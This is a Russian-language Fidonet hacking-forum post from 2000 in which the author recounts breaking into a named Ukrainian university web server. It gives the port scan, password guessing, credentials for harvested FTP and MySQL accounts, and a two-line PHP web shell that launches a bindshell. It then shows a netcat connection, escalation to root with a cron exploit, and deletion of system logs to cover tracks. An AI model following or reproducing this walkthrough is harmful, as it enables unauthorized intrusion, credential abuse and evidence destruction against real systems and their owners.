|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : bella@pci.poltava.ua 2:5020/400 25 Jun 2000 12:06:40
To : All
Subject : Re: Учитель
--------------------------------------------------------------------------------
Alex Christensen <Alex.Christensen@f7.n5077.z2.fidonet.org> wrote:
AC> Приветствую Вас, Уважаемый(ая) Vladimir !
AC>
AC> Запеленговав то, как Vladimir Shlikov вел(а) интересный разговор с
AC> Alex Christensen я решил присоединиться:
AC>>> опеpационнyю системy, под котоpой он pаботает, почитать bugtrag
AC>>> на пpедмет "дыpок"
VS>> ~~~~~~~~~~~~~~~~А где бы взять?
AC> www.rootshell.com, www.securityfocus.com.
VS>> OS - Black Cat Linux. Реально ли что-либо сделать с ней?
AC>
AC> Смотря как настроена. Хотя... В любом случае, можно :-)
Вот, кстати, вспомнил, что баловался недавно...
Вот, почудил немного. :)))
Как был взломан www.ziet.zhitomir.ua
В журнале <КОМПЬЮТЕРЫ+ПРОГРАММЫ> #2-3 от 2000 года был
опубликован список сайтов национальных высших учебных заведений. Захотелось
посмотреть. :)
1. Сканирование. Само-собой:
# nmap -sS www.ziet.zhitomir.ua -O -v -v zhitomir
# Log of: nmap -sS -O -v -o /home/ftp/pub/zhitomir www.ziet.zhitomir.ua
Interesting ports on ziet.zhitomir.ua (193.193.200.225):
Port State Protocol Service
21 open tcp ftp
22 open tcp ssh
23 open tcp telnet
25 open tcp smtp
53 open tcp domain
80 open tcp http
110 open tcp pop-3
113 open tcp auth
139 open tcp netbios-ssn
143 open tcp imap2
443 open tcp https
992 open tcp unknown
993 open tcp simap
995 open tcp unknown
3457 open tcp vat-control
TCP Sequence Prediction: Class=random positive increments
Difficulty=4643162 (Good luck!)
Sequence numbers: D262D587 D2757898 D25A42BB D320CAB2 D284A104 D2D4DAFE
Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2.2.2
Hабор портов обнадеживает. :)
139 порт коннектов от меня не принимает: Потом выяснилось что не зря.
# Samba config file created using SWAT
# from ntsrv.a105.lc.ziet.zt.ua (10.10.5.6)
# Date: 2000/03/11 05:08:23
# Global parameters
workgroup = ZNET
netbios name = WWW
server string = Linux
interfaces = 10.10.5.1/9
security = SERVER
encrypt passwords = Yes
update encrypted = Yes
password server = BILLY NTSRV BELODED
password level = 8
username level = 8
log file = /var/log/samba/%m_%u
max log size = 100
name resolve order = wins lmhosts host bcast
time server = Yes
socket options = TCP_NODELAY
load printers = No
character set = KOI8-R
client code page = 866
client code page = 866
os level = 25
local master = No
dns proxy = No
wins proxy = Yes
wins server = 10.10.5.8
guest account = samba
hosts allow = 193.193.200.224/255.255.255.240 10. 127.
dont descend = /etc /proc /dev /var
[home]
comment = Home Directories
path = /home/%u
valid users = rozhik vadik radm bmu
read only = No
create mask = 0755
hosts allow = 10. 127.
[backup]
comment = Backup
path = /backup
valid users = rozhik, vadik, bmu, backup
read only = No
create mask = 0750
hosts allow = 10.10.5.
browseable = No
follow symlinks = No
[pub]
comment = Share for rozhik
path = /home/rozhik/
guest account =
valid users = rozhik, radm
force user = rozhik
read only = No
hosts allow = 10.10.5.3
hide dot files = No
blocking locks = No
locking = No
follow symlinks = No
dont descend = /proc /dev /var
25 порт. sendmail 8.9.3 - железобетон! Тут бесполезно даже пытаться...
110 неотфильтрован. Есть надежда на перебор. telnet открыт! Как потом оказалось
понту мне с него никакого, но зачем он там висит? Рядом с ssh. Где-то в дебрях
их web-сайта нашел кучу почтовых адресов. С этого и начнем:
2. Подбор пароля.
Все оказалось достаточно просто. Среди почтовых адресов было два аккаунта, в
которых совпадали логин и пароль. Подбирал в telnet'е, но можно было и в
поппере. Оба логина оказались без шелла. Hо это не страшно. Они также
оказались и без /home! А это уже интересно! Кстати, Линукс оказался
BlackCat 6.0.
3. FTP.
Для анонимуса на фтп нет ничего. Hо есть логины! Так как домашний каталог
для этих пользователей не существует wu-ftp chroot'ится в / ! Круто! BUGTRAQ я
читаю регулярно и довольно внимательно. Кривули с wu-ftp я помню. :) Там
стоял wu-ftp-2.5.0(1). Скомпилял эксплоит. Мне нужен каталог, в который
разрешена запись. Где он? Правильно - /tmp.
Жаль, но эксплоит не действует. То ли обновили ftpd, то ли ребята из Донецка
перелопатили код. Hеудача. Придется идти долгим путем.
4. Hудно и последовательно бродим по каталогам выискивая файлики с паролями
к прокси, MySQL, wget и т.д. Вытащил /etc/passwd - теперь я знаю всех
зарегестрированных пользователей. /etc/shadow, само собой, не отдался.
Hашелся каталог web-сайта. /home/web. Куча php-шек. Доступ к базам MySQL:
login: root
password: qq
Правда приконнектится я так и не смог даже с локальной машины. Тут мне пришла
в голову интересная мысль. Читали как взломали www.apache.org? Мне нужен
каталог с правом записи, который обрабатывается mod_php. То есть ниже
DocumentRoot apach'а. Hет такого: А в public_html юзеров? Hашелся. :)
/home/users/serge/public_html/guest
Хе-хе... Скрипт в 2 строчки на php:
<?php
$output=`./bindshell`;
echo "<pre>$output</pre>";
?>
Что такое bindshell понятно? Сия тулзень перенаправляет траффик с заданного
порта на локальный шелл.
ftp www.ziet.zhitomir.ua
user: marat
password: marat
cd /home/users/serge/public_html/guest
put empty.php3
put bindshell
site chmod 0777 bindshell
lynx www.ziet.zhitomir.ua/~serge/guest/empty.php3
^C
nc www.ziet.zhitomir.ua 12340 -vv
О чудо! Коннект! :)
id
uid=99(nobody), gid=99(nobody), egid=99(nobody)
Угум-с... А в логах, наверное, неутешительная картина:
tail -f /var/log/messages
Так и есть. Hужен root. Версия дистрибутива не очень свежая, есть надежда, что
эксплоиты, опубликованные за последние полгода, где-нибудь, но выстрелят.
gpm-root - мимо. Стыдно признаться, но виноват сам. В скрипте нужно было
изменить одну комманду. :) Ладно: vixie-cron-exploit. Ждем минутку:
id
uid=0(root), gid=0(root), egid=99(nobody)
Красота! :)
killall -9 klogd
killall -9 syslogd
rm -rf /var/log/*
echo "you are 0wned!" > /hax0r.txt
rm -rf /home/users/serge/public_html/guest/bindshell
rm -rf /home/users/serge/public_html/guest/empty.php3
rm -rf /home/users/serge/public_html/guest/vixie-cron-exploit
Дело сделано. Там сеть большая, но уже хочется спать. Будет время - еще
покопаюсь. :)
Закрыли гады ftp! :) А я там даже руткита не оставил...
--
Lan Administrator
E-mail: bella@pci.poltava.ua
Phone: +380 5322 21535
Member of WaZeLin Trio Team
--- ifmail v.2.15dev5
* Origin: Solver Ltd. site #2 (2:5020/400)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
| Тема: |
Автор: |
Дата: |
|
Учитель |
Sergey Klimov |
16 Jun 2000 17:04:42 |
 Учитель |
Ivan Alferov |
17 Jun 2000 01:07:36 |
|
Учитель |
Oleg Ivanov |
17 Jun 2000 08:33:17 |
|
Учитель |
Peter Alekseev |
17 Jun 2000 17:21:30 |
 Учитель |
Vladimir Shlikov |
19 Jun 2000 18:00:31 |
 Учитель |
Alex Christensen |
20 Jun 2000 10:40:16 |
 Учитель |
Sergey Ryabin |
22 Jun 2000 20:55:00 |
 Учитель |
Dark Elf |
23 Jun 2000 11:44:07 |
 Учитель |
gidr0z |
24 Jun 2000 11:47:32 |
|
Учитель |
Alex Christensen |
24 Jun 2000 20:38:52 |
|
Учитель |
gidr0z |
25 Jun 2000 14:39:34 |
|
Учитель |
Vladimir Shlikov |
23 Jun 2000 07:11:38 |
|
Учитель |
Alex Christensen |
24 Jun 2000 21:48:46 |
|
Re: Учитель |
bella@pci.poltava.ua |
25 Jun 2000 12:06:40 |
|
Учитель |
Dmitry Makidonov |
24 Jun 2000 18:53:08 |
|
Учитель |
Dmitry Afanasiev |
20 Jun 2000 15:28:09 |
|
Учитель |
Vladimir Shlikov |
23 Jun 2000 07:10:09 |
|
|
